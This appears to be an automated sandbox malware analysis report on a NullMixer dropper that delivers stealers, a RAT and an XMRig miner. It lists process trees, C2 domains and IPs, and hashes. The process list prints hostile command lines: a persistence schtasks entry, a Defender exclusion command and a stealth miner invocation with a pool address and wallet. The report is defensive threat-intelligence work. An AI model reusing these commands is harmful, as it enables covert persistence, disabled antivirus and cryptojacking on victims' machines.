Malware Analysis Report

2024-10-19 02:13

Sample ID 231231-ej4ygaecdq
Target 2737e2cab1e399c563fe0557683234fd
SHA256 f7f5898bbed2b677a52a031071110b8aebb4b3eba2669703f6dd60e6953dc2a2
Tags
nullmixer privateloader redline risepro sectoprat smokeloader vidar xmrig 706 build1 pub6 backdoor dropper infostealer loader miner persistence rat stealer trojan aspackv2
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f7f5898bbed2b677a52a031071110b8aebb4b3eba2669703f6dd60e6953dc2a2

Threat Level: Known bad

The file 2737e2cab1e399c563fe0557683234fd was found to be: Known bad.

Malicious Activity Summary

nullmixer privateloader redline risepro sectoprat smokeloader vidar xmrig 706 build1 pub6 backdoor dropper infostealer loader miner persistence rat stealer trojan aspackv2

Vidar

RedLine payload

RedLine

RisePro

xmrig

SectopRAT

SectopRAT payload

PrivateLoader

NullMixer

SmokeLoader

Vidar Stealer

XMRig Miner payload

Loads dropped DLL

ASPack v2.12-2.42

Executes dropped EXE

Looks up external IP address via web service

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Program crash

Enumerates physical storage devices

Unsigned PE

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-12-31 03:59

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-12-31 03:59

Reported

2024-01-02 03:57

Platform

win7-20231215-en

Max time kernel

5s

Max time network

170s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2737e2cab1e399c563fe0557683234fd.exe"

Signatures

NullMixer

dropper nullmixer

PrivateLoader

loader privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

RisePro

stealer risepro

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Vidar

stealer vidar

xmrig

miner xmrig

Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2737e2cab1e399c563fe0557683234fd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\f35fb6370e5673.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\f35fb6370e5673.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\227af833e4e9ad4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\227af833e4e9ad4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\23cfc2c69e2b5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\23cfc2c69e2b5.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\52748077bb26.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\52748077bb26.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\cc8d5bf9d8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\cc8d5bf9d8.exe N/A
N/A N/A C:\Windows\system32\DllHost.exe N/A
N/A N/A C:\Windows\system32\DllHost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\23cfc2c69e2b5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\23cfc2c69e2b5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\23cfc2c69e2b5.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\cfbebc6111c611.exe N/A

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api.db-ip.com N/A N/A
N/A api.db-ip.com N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1820 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\2737e2cab1e399c563fe0557683234fd.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1820 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\2737e2cab1e399c563fe0557683234fd.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1820 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\2737e2cab1e399c563fe0557683234fd.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1820 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\2737e2cab1e399c563fe0557683234fd.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1820 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\2737e2cab1e399c563fe0557683234fd.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1820 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\2737e2cab1e399c563fe0557683234fd.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 1820 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\2737e2cab1e399c563fe0557683234fd.exe C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
PID 2140 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe
PID 2140 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe
PID 2140 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe
PID 2140 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe
PID 2140 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe
PID 2140 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe
PID 2140 wrote to memory of 2960 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe
PID 2960 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2900 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2928 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2940 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 3040 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2960 wrote to memory of 2616 N/A C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2737e2cab1e399c563fe0557683234fd.exe

"C:\Users\Admin\AppData\Local\Temp\2737e2cab1e399c563fe0557683234fd.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c cfbebc6111c611.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 23cfc2c69e2b5.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 45523e3cdecd50c9.exe

C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\45523e3cdecd50c9.exe

45523e3cdecd50c9.exe

C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\23cfc2c69e2b5.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\23cfc2c69e2b5.exe" -a

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\cc8d5bf9d8.exe

cc8d5bf9d8.exe

C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\52748077bb26.exe

52748077bb26.exe

C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\dc8baab07.exe

dc8baab07.exe

C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\227af833e4e9ad4.exe

227af833e4e9ad4.exe

C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\23cfc2c69e2b5.exe

23cfc2c69e2b5.exe

C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\cfbebc6111c611.exe

cfbebc6111c611.exe

C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\f35fb6370e5673.exe

f35fb6370e5673.exe

C:\Users\Admin\AppData\Local\Temp\7zSC58F2F96\0c879100232.exe

0c879100232.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c cc8d5bf9d8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 52748077bb26.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c dc8baab07.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c f35fb6370e5673.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2960 -s 428

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 227af833e4e9ad4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 0c879100232.exe

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1704167716 0

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1824 -s 972

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\7zS61DF.tmp\Install.cmd" "

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2844 CREDAT:275457 /prefetch:2

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/16B4c7

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF}

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.main/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BJ+edII5Fll530cZ/+msGEWovb73nU3RrOnuNmRoFcg" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth

Network

Country Destination Domain Proto
US 8.8.8.8:53 marisana.xyz udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 live.goatgame.live udp
US 8.8.8.8:53 s.lletlee.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 34.117.186.192:443 ipinfo.io tcp
US 8.8.8.8:53 db-ip.com udp
US 104.26.5.15:443 db-ip.com tcp
US 8.8.8.8:53 lenak513.tumblr.com udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 74.114.154.22:443 lenak513.tumblr.com tcp
US 8.8.8.8:53 music-sec.xyz udp
US 162.159.134.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 api.db-ip.com udp
US 172.67.75.166:443 api.db-ip.com tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 www.maxmind.com udp
US 104.18.145.235:80 www.maxmind.com tcp
US 3.141.96.53:443 live.goatgame.live tcp
NL 37.0.8.235:80 tcp
US 8.8.8.8:53 www.wpdsfds23x.com udp
US 8.8.8.8:53 iplogger.org udp
US 172.67.132.113:443 iplogger.org tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 apps.identrust.com udp
US 3.141.96.53:443 live.goatgame.live tcp
GB 96.17.179.184:80 apps.identrust.com tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 172.67.132.113:443 iplogger.org tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
NL 37.0.11.8:80 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 aucmoney.com udp
US 8.8.8.8:53 thegymmum.com udp
US 8.8.8.8:53 atvcampingtrips.com udp
US 8.8.8.8:53 kuapakualaman.com udp
US 8.8.8.8:53 renatazarazua.com udp
US 8.8.8.8:53 nasufmutlu.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 172.67.132.113:443 iplogger.org tcp
US 172.67.132.113:443 iplogger.org tcp
LV 45.142.213.135:30058 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 x2.c.lencr.org udp
GB 173.222.13.40:80 x2.c.lencr.org tcp
US 8.8.8.8:53 x2.c.lencr.org udp
GB 173.222.13.40:80 x2.c.lencr.org tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
GB 173.222.13.40:80 x2.c.lencr.org tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
NL 212.193.30.115:80 tcp
LV 45.142.213.135:30058 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 sanctam.net udp
US 3.141.96.53:443 live.goatgame.live tcp
LV 45.142.213.135:30058 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 github.com udp
DE 140.82.121.4:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
N/A 127.0.0.1:49278 tcp
N/A 127.0.0.1:49281 tcp
US 3.141.96.53:443 live.goatgame.live tcp
NL 212.193.30.115:80 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
LV 45.142.213.135:30058 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
NL 212.193.30.115:80 tcp
US 8.8.8.8:53 xmr-eu1.nanopool.org udp
FR 141.94.23.83:14433 xmr-eu1.nanopool.org tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
LV 45.142.213.135:30058 tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
LV 45.142.213.135:30058 tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
LV 45.142.213.135:30058 tcp
NL 212.193.30.115:80 tcp
US 3.20.137.44:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
LV 45.142.213.135:30058 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
LV 45.142.213.135:30058 tcp

Files

\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 05cd842f936d714465cb73287b0ef83d
SHA1 b39bee28bc4c42bd086a8ba1c8fd5560a26ca881
SHA256 ee6b821ec26751ccb3e14e3ebc7aae737298d63a18ac2b27f6a295ef108b8372
SHA512 789868c466a6a7165f8de5d8982c21549b5a801a356666c89680865b692f9b1ee7826b29fa56ea73096fb20ec687440d64be6cdc587947351d12353c7bb8e2b7

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

